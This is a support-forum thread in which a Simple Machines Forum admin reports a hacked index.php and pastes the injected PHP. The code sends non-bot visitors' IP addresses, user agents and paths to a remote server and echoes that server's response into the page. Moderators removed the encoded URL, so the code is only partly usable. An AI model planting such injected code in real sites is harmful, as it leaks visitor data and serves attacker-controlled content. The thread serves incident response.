SMF Support > SMF 2.0.x Support

Nasty, Hidden Virus on Simple Machines

<< < (13/14) > >>

igirisjin:
Update ... hacked again.


Site was a bit slow and then avg browser guard stated giving warnings. I dont have access logs older than a few days and wouldnt know what to look for anyway. It seems like the index.php file was changed - before last data in the raw logs, on the 28th April.

Not sure how they are getting access but this time I will get the server reset and start over with new files and passwords.

This is the code added on to the end of the index.php file while I was away on a trip.


--- Code: ---<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( '{snap}').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>
--- End code ---

(edit: removed base64 string to render code (semi-)unusable)

nend:
If you decode the base64 that is in the script you end up with this url.


--- Code: ---http://{snap}.com/stat/stat.php
--- End code ---

The site is unavailable though.  :-\

(edit: removed possible malicious URL)

青山 素子:
You shouldn't be posting whole code and URLs like that, especially if there is the chance that it will or may be accessible.

I put in a report asking the team on the site obfuscate the code and URL a bit so people won't be tempted to try things.

Yoshi:
I got rid of the URL and the base64_decode in the posts. I posted a copy of the base64_decode in the moderation report.

Doctor Deejay:
Something you might want to do, is adding "die;" right before "?>" in index.php. So even if malicious code is added, none of your users will notice it. :)

Navigation

[0] Message Index

[#] Next page

[*] Previous page